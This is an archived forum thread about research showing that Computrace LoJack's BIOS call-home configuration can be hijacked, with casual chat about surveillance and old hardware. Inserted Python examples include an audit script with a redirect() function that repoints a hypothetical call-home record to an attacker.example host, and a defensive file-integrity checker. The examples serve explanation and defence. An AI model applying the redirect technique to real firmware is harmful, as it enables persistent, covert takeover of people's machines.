House Price Crash Forum

Archived

This topic is now archived and is closed to further replies.

interestrateripoff

Researchers Find Insecure Bios 'rootkit' Pre-loaded In Laptops


http://blogs.zdnet.com/security/?p=3828&tag=nl.e550

LAS VEGAS — A popular laptop theft-recovery service that ships on notebooks made by HP, Dell, Lenovo, Toshiba, Gateway, Asus and Panasonic is actually a dangerous BIOS rootkit that can be hijacked and controlled by malicious hackers.

The service — called Computrace LoJack for Laptops — contains design vulnerabilities and a lack of strong authentication that can lead to "a complete and persistent compromise of an affected system," according to a Black Hat conference presentation by researchers Alfredo Ortega and Anibal Sacco from Core Security Technologies.

Computrace LoJack for Laptops, which is pre-installed on about 60 percent of all new laptops, is a software agent that lives in the BIOS and periodically calls home to a central authority for instructions in case a laptop is stolen. The call-home mechanism allows the central authority to instruct the BIOS agent to wipe all information as a security measure, or to track the whereabouts of the system.

For it to be an effective theft-recovery service, Ortega and Sacco explained that it has to be stealthy, must have complete control of the system and must be highly persistent to survive a hard disk wipe or operating system reinstall.

"This is a rootkit. It might be a legitimate rootkit, but it's a dangerous rootkit," Sacco declared. The research team stumbled upon the rootkit-like technology in the course of their work on BIOS-based malware attacks. At last year's CanSecWest security conference, the duo demonstrated methods for infecting the BIOS with persistent code that survives reboots and reflashing attempts.

The biggest problem, Ortega explained, is that a malicious hacker can manipulate and control the call-home process. That’s because the technology uses a configuration method that contains the IP address, port and URL, all hard-coded in the Option-ROM. At first run, Sacco explained that the configuration method is copied in many places, including the registry and hard-disk inter-partition space.

The duo found that it's trivial to search and modify the configuration, giving them the ability to point the IP and URL to a malicious site, where un-authenticated payloads can be directed to the laptop.

Because the rootkit is white-listed by anti-virus software, the malicious modifications will go unnoticed. On unsigned BIOSes, Sacco and Ortega said modification of the configuration allows for a very persistent and dangerous form of rootkit.

So the govt could effectively take control of 60% of laptops? Your thoughts will be controlled.
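The weak point the article describes is a call-home record (IP, port, URL) that sits unsigned in the Option ROM and is copied to the registry and inter-partition space, so anyone who can find the bytes can repoint the agent. The script below is an added example, not code from the ZDNet article, from Core Security or from Absolute/Computrace: it scans a raw dump for such records, reports any that do not point at the expected endpoint, and shows the "search and modify" step on a constructed buffer. The record layout (a `CALLHOME` magic, four IPv4 bytes, a port, a NUL-padded URL), the expected endpoint values and the dump itself are all hypothetical stand-ins, since the article does not document the real structure.

```python
from __future__ import annotations

import ipaddress
import re
import struct
from dataclasses import dataclass

# HYPOTHETICAL record layout; the real Computrace structure is not documented
# in the article. Magic marker, IPv4 address, port, fixed-width NUL-padded URL.
MAGIC = b"CALLHOME"
HEADER = struct.Struct("<8s4sH")   # magic, 4 raw IPv4 bytes, little-endian port
URL_MAX = 64
RECORD_LEN = HEADER.size + URL_MAX

# What the OEM image is supposed to contain (assumed values, RFC 5737 ranges).
EXPECTED_IPS = {"203.0.113.10"}
EXPECTED_HOSTS = {"recovery.example.com"}


@dataclass
class CallHomeConfig:
    offset: int
    ip: str
    port: int
    url: str


def find_configs(blob: bytes) -> list[CallHomeConfig]:
    """Return every copy of the record in a raw dump. The agent copies the
    record to several places (Option ROM, registry, inter-partition space),
    so a single dump can hold more than one."""
    found: list[CallHomeConfig] = []
    pos = 0
    while True:
        idx = blob.find(MAGIC, pos)
        if idx < 0 or idx + RECORD_LEN > len(blob):
            return found
        _magic, ip_raw, port = HEADER.unpack_from(blob, idx)
        url_raw = blob[idx + HEADER.size: idx + RECORD_LEN]
        url = url_raw.split(b"\x00", 1)[0].decode("ascii", "replace")
        found.append(CallHomeConfig(idx, str(ipaddress.IPv4Address(ip_raw)), port, url))
        pos = idx + RECORD_LEN


def host_of(url: str) -> str:
    m = re.match(r"^[a-z][a-z0-9+.-]*://([^/:]+)", url)
    return m.group(1) if m else ""


def audit(blob: bytes) -> list[str]:
    """One finding per record whose IP or URL host is not the expected endpoint.
    An empty result is not proof of integrity: nothing in the record is signed,
    so it only says the bytes currently match what you expect."""
    findings = []
    for cfg in find_configs(blob):
        if cfg.ip not in EXPECTED_IPS or host_of(cfg.url) not in EXPECTED_HOSTS:
            findings.append(f"offset {cfg.offset:#06x}: call-home is {cfg.ip}:{cfg.port} {cfg.url}")
    return findings


def build_record(ip: str, port: int, url: str) -> bytes:
    url_b = url.encode("ascii")
    if len(url_b) >= URL_MAX:
        raise ValueError("URL does not fit the fixed-width field")
    return HEADER.pack(MAGIC, ipaddress.IPv4Address(ip).packed, port) + url_b.ljust(URL_MAX, b"\x00")


def redirect(blob: bytes, ip: str, port: int, url: str) -> bytes:
    """The step the article calls trivial: overwrite every copy of the record
    in place. No key, checksum or signature has to be forged to do it."""
    out = bytearray(blob)
    replacement = build_record(ip, port, url)
    for cfg in find_configs(blob):
        out[cfg.offset: cfg.offset + RECORD_LEN] = replacement
    return bytes(out)


# Constructed dump standing in for an Option ROM image: filler, the record,
# more filler, and a second copy of the record.
VENDOR_RECORD = build_record("203.0.113.10", 443, "https://recovery.example.com/agent")
ROM_DUMP = b"\xff" * 32 + VENDOR_RECORD + b"\x00" * 16 + VENDOR_RECORD

if __name__ == "__main__":
    print("vendor image:", audit(ROM_DUMP) or "endpoints as expected")
    tampered = redirect(ROM_DUMP, "198.51.100.7", 8080, "http://attacker.example/agent")
    for line in audit(tampered):
        print("tampered image:", line)
```

Run it against a real dump only if you know the real record layout; the point of the example is the shape of the problem. A clean audit says the bytes match what you expect today, nothing more, and the same scan in an attacker's hands is the attack. The durable fix is on the agent side: it has to authenticate the server's replies (a public key pinned in read-only ROM, signatures over every instruction it will act on) rather than trust wherever a rewritable record tells it to call.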


Would this only work on laptops hooked up to go onto the net? Or is this "call home" mechanism something different?

Glad I've taken the precaution of a dedicated browser machine with other PCs and laptops off-line.

Also hate the fact that all new laptops seem to have a webcam built in. Combine this "call home" with a webcam link = camera in every house.


So even putting Linux on your machine does not save you from government snoops.

Encryption is going to become the norm as years go by, unless you don't mind Big Brother reading every damn word you write.

Forget mainstream encryption; write your own that can link into pluggable email agents running on the server.

We are talking about computers, not fashion toys :lol:

I'll remember that next time I am running virtualised windows faster than the guy on the dell.

:P

I'll remember that next time I am running virtualised windows faster than the guy on the dell.

:P

/pats his refurbished HP NW8000

Pretty good combination of portability, performance, battery life and features. Not bad for ~£150 last year... has an XP Pro licence too. :)

Would this only work on laptops hooked up to go onto the net? Or is this "call home" mechanism something different?

Glad I've taken the precaution of a dedicated browser machine with other PCs and laptops off-line.

Also hate the fact that all new laptops seem to have a webcam built in. Combine this "call home" with a webcam link = camera in every house.

You would be horrified if you went into the menu system of the Adobe Flash software needed for certain internet sites.

Defaults = microphone and webcam connection set to "ON" plus other highly dubious, unnecessary connections.

I can only say they have been put on there to SPY on you!

Only found these by accident.

/pats his refurbished HP NW8000

Pretty good combination of portability, performance, battery life and features. Not bad for ~£150 last year... has an XP Pro licence too. :)

Horses for courses.

Pats his top-end MacBook Pro, with Windows XP, Windows Vista (urgh), Linux, and Mac OS X 10.5.

:)

Horses for courses.

Pats his top-end MacBook Pro, with Windows XP, Windows Vista (urgh), Linux, and Mac OS X 10.5.

:)

Pfft. Really, I could spend the money on other more important stuff, but fair play to you if a MBP was within your budget. :)

This will only work with rootkits installed on the hard disk, not the BIOS.

Rootkits actually were commonplace in the DOS days before Windows, but then the AV companies got lazy, or young blood in the AV companies didn't know about the old-school ways of doing some things, just like many can't program in, say, assembler, a low-level language, but can use a high-level language like VB.net or C#.

I think you miss my point - the software that was described as a rootkit, is not a rootkit. It is legitimate software - just badly written, and thus opens holes that it shouldn't.

Strictly speaking, even then it's not a rootkit, which is instead a collection of packages that you install so that no one knows you have taken over the computer, rather than the takeover vector itself. For instance you might, on *nix, install a new version of 'ls' that doesn't report modify dates correctly on certain files that you have changed, or a version of 'rm' that won't delete certain files. I took over a server that had been rooted from another admin a few years back, which also had no backups. It took about two weeks to untangle everything.
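The kind of rootkit described in that post (a replaced 'ls' that lies about dates, an 'rm' that refuses to delete certain files) is what a content baseline catches, and is what shortens the "two weeks to untangle" to an afternoon. The script below is an added example, not something from the post or the thread: it hashes every regular file under a directory, stores hash, size and permission bits, and reports what changed, appeared or vanished against an earlier baseline. The `bin` tree, the trojaned 'ls' and the dropped hidden file are constructed in a temporary directory so the example runs offline.

```python
import hashlib
import os
import stat
import tempfile


def file_digest(path: str) -> str:
    """SHA-256 of a file's contents, read in chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def take_baseline(root: str) -> dict[str, dict]:
    """Map every regular file under root (relative POSIX path) to its
    hash, size and permission bits. Timestamps are deliberately left out:
    they are what a trojaned 'ls' lies about, and they are trivially reset."""
    entries: dict[str, dict] = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            if not stat.S_ISREG(st.st_mode):
                continue  # symlinks are not followed
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            entries[rel] = {
                "sha256": file_digest(full),
                "size": st.st_size,
                "mode": stat.S_IMODE(st.st_mode),
            }
    return entries


def compare(old: dict[str, dict], new: dict[str, dict]) -> dict[str, list[str]]:
    """Files whose hash/size/mode changed, files that appeared, files that vanished."""
    return {
        "modified": sorted(p for p in old.keys() & new.keys() if old[p] != new[p]),
        "added": sorted(new.keys() - old.keys()),
        "removed": sorted(old.keys() - new.keys()),
    }


def demo() -> dict[str, list[str]]:
    """Constructed scenario: a tiny 'bin' tree, then the changes a rootkit of
    the kind described above would make (replaced ls, a removed tool,
    a hidden file), and the report that catches them."""
    with tempfile.TemporaryDirectory() as root:
        bindir = os.path.join(root, "bin")
        os.mkdir(bindir)
        for name in ("ls", "rm", "ps"):
            path = os.path.join(bindir, name)
            with open(path, "wb") as f:
                f.write(b"#!/bin/sh\nexec /usr/bin/" + name.encode() + b' "$@"\n')
            os.chmod(path, 0o755)
        before = take_baseline(root)

        # The intrusion: 'ls' now filters out anything named 'secret',
        # 'ps' is removed, and a hidden file is dropped next to them.
        with open(os.path.join(bindir, "ls"), "wb") as f:
            f.write(b'#!/bin/sh\nexec /usr/bin/ls "$@" | grep -v secret\n')
        os.remove(os.path.join(bindir, "ps"))
        with open(os.path.join(bindir, ".hidden"), "wb") as f:
            f.write(b"placeholder payload\n")

        after = take_baseline(root)
        return compare(before, after)


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

Two caveats that matter more than the code. The baseline has to be taken before the box is touched and kept off-host or on read-only media, or the intruder edits it along with everything else. And the hashing has to run from a trusted environment (boot media, or the disk mounted on a clean machine): a rootkit that replaces 'ls' can just as easily replace 'sha256sum' or the Python interpreter, and a BIOS-resident one, as the first post in this thread describes, survives even the reinstall.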

Pfft. Really, I could spend the money on other more important stuff, but fair play to you if a MBP was within your budget. :)

Freebie, but to be honest, given the amount of time the wife, mum, dad, in-laws, etc. spend cursing their slow and unreliable PCs, I'd have spent the money.

Freebie, but to be honest, given the amount of time the wife, mum, dad, in-laws, etc. spend cursing their slow and unreliable PCs, I'd have spent the money.

Well, I've built systems from £50 if it was required. The downside is no warranty, but it's rare for anything to break provided it was of decent manufacture to begin with. Sold a friend a used system 4 years back and only one item has needed replacing since then; it wasn't particularly expensive either. Considering the unit itself is coming up to 6 years old, that isn't bad.


I got a rootkit virus recently. Persistent little bugger.

It didn't stand a chance against me though. I formatted the drive and now I got a PC twice as fast ;)

Well, I've built systems from £50 if it was required. The downside is no warranty, but it's rare for anything to break provided it was of decent manufacture to begin with. Sold a friend a used system 4 years back and only one item has needed replacing since then; it wasn't particularly expensive either. Considering the unit itself is coming up to 6 years old, that isn't bad.

Sure - it's rarely the hardware they have a problem with (well now that the capacitor plague has died out), just the OS.

I've also built any number of systems, Mac and PC. My biggest challenge was taking the parts from an eMac, a PowerBook and a Dell, and fusing them all together into a working Hackintosh. The real challenge was that I had to create half the connectors myself, and do some motherboard SMT desoldering to get it to work. Of course, to be fair, you should probably price your time in too.

All that being said, it's a hell of a lot easier to home-build a desktop than a laptop (although I do have two old PowerBooks sitting in a cupboard that I am trying to turn into a dual-screen tablet Mac, but that's going a bit slowly!)

I got a rootkit virus recently. Persistent little bugger.

It didn't stand a chance against me though. I formatted the drive and now I got a PC twice as fast ;)

Unless it was a BIOS virus, of course; then it'll be back!!!

:ph34r:

Sure - it's rarely the hardware they have a problem with (well now that the capacitor plague has died out), just the OS.

Heh. I have a working Packard Bell 9450 system (Slot 1!) from 1998 sat here next to me; I use it for legacy applications. Apart from the PSU, nothing's needed replacing yet.

I've also built any number of systems, Mac and PC. My biggest challenge was taking the parts from an eMac, a PowerBook and a Dell, and fusing them all together into a working Hackintosh. The real challenge was that I had to create half the connectors myself, and do some motherboard SMT desoldering to get it to work. Of course, to be fair, you should probably price your time in too.

I'm not that great when it comes to electrical work though :P Doing a solder job is only worth the risk on something old as far as I'm concerned. Parts are cheap enough that making PCBs/connectors myself is a waste of effort.

All that being said, it's a hell of a lot easier to home-build a desktop than a laptop (although I do have two old PowerBooks sitting in a cupboard that I am trying to turn into a dual-screen tablet Mac, but that's going a bit slowly!)

Indeed it is. I've been able to get used laptop motherboards in some cases, HP Evos for example (the graphics controller often gets improved with the replacement too).

I'm not that great when it comes to electrical work though :P Doing a solder job is only worth the risk on something old as far as I'm concerned. Parts are cheap enough that making PCBs/connectors myself is a waste of effort.

Sure, it's only worth it when you have to, like when you want to connect some non-standard Dell connector to some non-standard Foxconn (Apple) connector. Luckily I get lots of practice at really hard-arsed soldering in the day job. Quite often requiring a microscope to see what you're doing!

My dad still has a 286 from the early eighties so that he can look at WordPerfect files! Every few years he digs it out to look through a floppy. Built to last in those days.

Guest DisposableHeroes
Sure, it's only worth it when you have to, like when you want to connect some non-standard Dell connector to some non-standard Foxconn (Apple) connector. Luckily I get lots of practice at really hard-arsed soldering in the day job. Quite often requiring a microscope to see what you're doing!

My dad still has a 286 from the early eighties so that he can look at WordPerfect files! Every few years he digs it out to look through a floppy. Built to last in those days.

Funny you should say that, my dad just cleared out his loft.

386

486

Commodore VIC-20 (tape games)

Commodore +4 (tape games)

Amstrad 9512 CP/M, which DOS was based on.

My brother found his old walkman, tape radio stereo recorder, mint condition.

But what the hell can you do with it all. Might start a little museum.

Sure, it's only worth it when you have to, like when you want to connect some non-standard Dell connector to some non-standard Foxconn (Apple) connector. Luckily I get lots of practice at really hard-arsed soldering in the day job. Quite often requiring a microscope to see what you're doing!

I have a Dell motherboard here... Socket 478, 400 FSB, SDRAM, no AGP slot :P Front USB and audio are proprietary, but I have the cables/PCBs for them. Just need to figure out how to slot them securely in a case somewhere...

My dad still has a 286 from the early eighties so that he can look at WordPerfect files! Every few years he digs it out to look through a floppy. Built to last in those days.

Yeah, tech getting cheaper hasn't necessarily retained the same level of build quality.

